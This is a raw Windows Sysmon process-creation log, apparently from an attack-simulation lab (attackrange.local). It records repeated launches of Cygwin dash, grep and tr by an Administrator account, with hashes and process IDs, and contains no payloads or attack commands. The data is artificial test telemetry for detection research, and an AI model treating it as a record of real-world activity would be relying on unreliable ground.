14:55:57.428{A8622C2F-53FD-6078-4E0A-00000000AE01}4788C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052049Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.420{A8622C2F-53FD-6078-4D0A-00000000AE01}5412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052037Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.412{A8622C2F-53FD-6078-4C0A-00000000AE01}6336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052025Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.404{A8622C2F-53FD-6078-4B0A-00000000AE01}6196C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052013Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.396{A8622C2F-53FD-6078-4A0A-00000000AE01}7140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052001Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.388{A8622C2F-53FD-6078-490A-00000000AE01}6076C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051989Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.380{A8622C2F-53FD-6078-480A-00000000AE01}5628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051977Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.372{A8622C2F-53FD-6078-470A-00000000AE01}3208C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051965Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.364{A8622C2F-53FD-6078-460A-00000000AE01}3368C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051953Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.356{A8622C2F-53FD-6078-450A-00000000AE01}4476C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051941Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.349{A8622C2F-53FD-6078-440A-00000000AE01}5108C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051929Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.341{A8622C2F-53FD-6078-430A-00000000AE01}1392C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051917Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.333{A8622C2F-53FD-6078-420A-00000000AE01}6884C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051905Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.325{A8622C2F-53FD-6078-410A-00000000AE01}5184C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051893Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.317{A8622C2F-53FD-6078-400A-00000000AE01}6268C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051881Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.309{A8622C2F-53FD-6078-3F0A-00000000AE01}7016C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051869Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.301{A8622C2F-53FD-6078-3E0A-00000000AE01}5620C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051857Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.292{A8622C2F-53FD-6078-3D0A-00000000AE01}5224C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051845Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.284{A8622C2F-53FD-6078-3C0A-00000000AE01}1800C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051833Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.276{A8622C2F-53FD-6078-3B0A-00000000AE01}2484C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051821Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.267{A8622C2F-53FD-6078-3A0A-00000000AE01}2084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051809Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.259{A8622C2F-53FD-6078-390A-00000000AE01}6332C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051797Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.251{A8622C2F-53FD-6078-380A-00000000AE01}2664C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051785Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.243{A8622C2F-53FD-6078-370A-00000000AE01}3420C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051773Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.235{A8622C2F-53FD-6078-360A-00000000AE01}5828C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051761Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.227{A8622C2F-53FD-6078-350A-00000000AE01}5344C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051749Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.218{A8622C2F-53FD-6078-340A-00000000AE01}4288C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051737Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.210{A8622C2F-53FD-6078-330A-00000000AE01}5312C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051725Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.202{A8622C2F-53FD-6078-320A-00000000AE01}5804C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051713Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.188{A8622C2F-53FD-6078-310A-00000000AE01}3008C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051701Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.181{A8622C2F-53FD-6078-300A-00000000AE01}6084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051689Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.173{A8622C2F-53FD-6078-2F0A-00000000AE01}5852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051677Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.164{A8622C2F-53FD-6078-2E0A-00000000AE01}6652C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051665Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.157{A8622C2F-53FD-6078-2D0A-00000000AE01}4696C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051653Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.149{A8622C2F-53FD-6078-2C0A-00000000AE01}1844C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051641Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.141{A8622C2F-53FD-6078-2B0A-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051629Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.133{A8622C2F-53FD-6078-2A0A-00000000AE01}7016C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FD-6078-290A-00000000AE01}6852C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051619Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.126{A8622C2F-53FD-6078-290A-00000000AE01}6852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051607Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.115{A8622C2F-53FD-6078-280A-00000000AE01}6748C:\cygwin64\bin\tr.exe-----"C:\cygwin64\bin\tr.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=65789252526C9B5F8A73D99D53C2CC58,SHA256=464DA547E4E2B9B5E5E3C7B4773820257AAA39BCF85318B5CE86443E6EA5F3C7,IMPHASH=CDDCB078A4D97440CAEF0552021BCA5C{A8622C2F-53FD-6078-260A-00000000AE01}2484C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051588Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.107{A8622C2F-53FD-6078-270A-00000000AE01}5516C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FD-6078-250A-00000000AE01}5084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051587Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:57.107{A8622C2F-53FD-6078-260A-00000000AE01}2484C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FD-6078-240A-00000000AE01}4160C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051577Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.099{A8622C2F-53FD-6078-250A-00000000AE01}5084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FD-6078-240A-00000000AE01}4160C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051565Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 